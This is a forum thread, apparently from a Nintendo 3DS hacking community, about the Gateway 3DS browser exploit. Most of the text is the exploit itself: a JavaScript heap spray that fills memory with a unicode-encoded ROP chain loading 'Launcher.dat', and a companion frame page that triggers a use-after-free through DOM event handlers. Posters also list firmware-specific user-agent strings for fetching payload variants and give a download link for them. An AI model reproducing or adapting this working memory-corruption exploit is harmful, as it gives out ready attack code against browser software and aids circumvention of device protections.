cool...this could use a shortener though
cool...this could use a shortener though
3DS Browser Version 1.7498 For Firmware 4.0.0-4.5.0 > Mozilla/5.0 (Nintendo 3DS; U; ; de) Version/1.7498.EU
3DS Browser Version 1.7552 For Firmware 5.0.0-7.0.0 > Mozilla/5.0 (Nintendo 3DS; U; ; de) Version/1.7552.EU
3DS Browser Version 1.7567 For Firmware 7.1.0-16 > Mozilla/5.0 (Nintendo 3DS; U; ; de) Version/1.7567.EU
seme here just for euCan someone send me their files. Preferably someone with browser 1.7567.US
Can someone send me their files. Preferably someone with browser 1.7567.US
<html>
<head>
<style>
body {
color:white;
background:black;
}
</style>
<script>
function magicfun(mem, size, v) {
var a = new Array(size - 20);
nv = v + unescape("%ucccc");
for (var j = 0; j < a.length / (v.length / 4); j++) a[j] = nv;
var t = document.createTextNode(String.fromCharCode.apply(null, new Array(a)));
mem.push(t);
}
function dsm(evnt) {
var mem = [];
for (var j = 20; j < 430; j++) {
magicfun(mem, j, unescape("\u57c4\u0010\u57c4\u0010\u57c4\u0010\u57c4\u0010\uc2fc\u0010\u50b3\u0010\uca34\u0019\u85f0\u08b8\u8008\u0018\ua00c\u001d\u46eb\u0019\u0000\u08f1\u8630\u08b8\u0001\u0000\ub020\u0039\uc01c\u001c\u6010\u002c\ufe0c\u0022\u1ff0\u0023\ubff0\u002c\u4000\u0012\udff4\u0033\u57c4\u0010\uc2fc\u0010\ua000\u0001\u8af4\u0022\u0004\u08f1\u7334\u0010\uc024\u001c\u46eb\u0019\u0000\u08f1\u0020\u08f1\u1000\u08f0\u4000\u0000\u5ff8\u0029\u3ffc\u0025\u86e0\u0016\ue030\u002b\u2010\u0021\u1f40\u0027\uc05c\u0020\ue0c4\u002d\u2000\u001b\uc2fc\u0010\u850c\u08b8\ubacc\u0011\u57c4\u0010\u8af4\u0022\u8281\ud582\u0658\u0035\udd48\u0011\u8af4\u0022\u850c\u08b8\u7334\u0010\u4850\u0035\uc2fc\u0010\u8618\u08b8\ubacc\u0011\u7f6d\u0012\u014c\u0010\u37e0\u0010\u848c\u08b8\u840c\u08b8\ubacc\u0011\ubb00\u0011\u57c4\u0010\u8af4\u0022\u0000\u0000\u0658\u0035\u03a0\u0013\u65a8\u0010\u1434\u0010\uff64\u0022\u03a0\u0013\u8400\u08b8\u57c4\u0010\u57c4\u0010\u0b5c\u0010\ufe44\u0022\u57c4\u0010\u5ae0\u002c\u57c4\u0010\u8af4\u0022\u0658\u0035\u57c4\u0010\u2c93\u0018\uc2fc\u0010\u8618\u08b8\ubacc\u0011\udd48\u0011\u6694\u0010\u6694\u0010\u8af4\u0022\u0004\u0000\u0658\u0035\u0344\u0013\u8af4\u0022\u8618\u08b8\u7334\u0010\u0d24\u0010\u8af4\u0022\ub000\uf70f\u0658\u0035\u9864\u0011\u1a8c\u0015\u59c0\u0020\uc2fc\u0010\u8610\u08b8\u8af4\u0022\u0ffc\u08f0\u6694\u0010\u5fd4\u0035\u8af4\u0022\u84a8\u08b8\ufc24\u0010\u2215\u002c\u57c4\u0010\u57c4\u0010\u65a8\u0010\u5654\u002d\u3778\u0010\ua864\u002f\u9b94\u0011\ue780\u0020\u8605\u0012\u3da8\u0010\u85f8\u08b8\u57c4\u0010\u5ae0\u002c\udf28\u0010\uc8e4\u002f\u37e0\u0010\uc494\u0023\u0358\u0013\u1000\u08f0\u0344\u0013\u8400\u08b8\u57c4\u0010\u57c4\u0010\u0344\u0013\u0064\u006d\u0063\u003a\u002f\u004c\u0061\u0075\u006e\u0063\u0068\u0065\u0072\u002e\u0064\u0061\u0074\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0344\u0013\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000"));
}
}
</script>
</head>
<body>
<h1 align="center">GATEWAY 3DS LOADING...</h1>
<iframe width=0 height=0 src="frame.html"></iframe>
</body>
</html>
<html>
<head>
<script>
var nb = 0;
function handleBeforeLoad() {
if (++nb == 1) {
p.addEventListener('DOMSubtreeModified', parent.dsm, false);
} else if (nb == 2) {
p.removeChild(f);
}
}
function documentLoaded() {
f = window.frameElement;
p = f.parentNode;
var o = document.createElement("object");
o.addEventListener('beforeload', handleBeforeLoad, false);
document.body.appendChild(o);
}
window.onload = documentLoaded;
</script>
</head>
<body>
KEKEKEKEK...
</body>
</html>
Here is how it works:
the region doesn't matter, i made a simple c# app to download all of the different payloads and only the version string matters.
fw 2.0 = "Mozilla/5.0 (Nintendo 3DS; U; ; en) Version/1.7412.US"
fw 2.1-3.X = "Mozilla/5.0 (Nintendo 3DS; U; ; en) Version/1.7498.US"
fw 4.0-4.X = "Mozilla/5.0 (Nintendo 3DS; U; ; en) Version/1.7455.US"
fw 5.0-7.0 = "Mozilla/5.0 (Nintendo 3DS; U; ; en) Version/1.7552.US"
fw 7.1-9.X = "Mozilla/5.0 (Nintendo 3DS; U; ; en) Version/1.7567.US"
so there are 5 different payloads.
here the payloads in html and as binary dat:
http://www.mediafire.com/download/2pd0p3htica8c4n/gateway30_payloads.7z
Oh upload that server's data and share it please. It will be very helpful in case we don't have internet or Gateway's site is overloaded o.O
Wait that includes the html file of the exploit? I didn't notice :oops: LOL Studying physics right now hahaha so no time to think anything else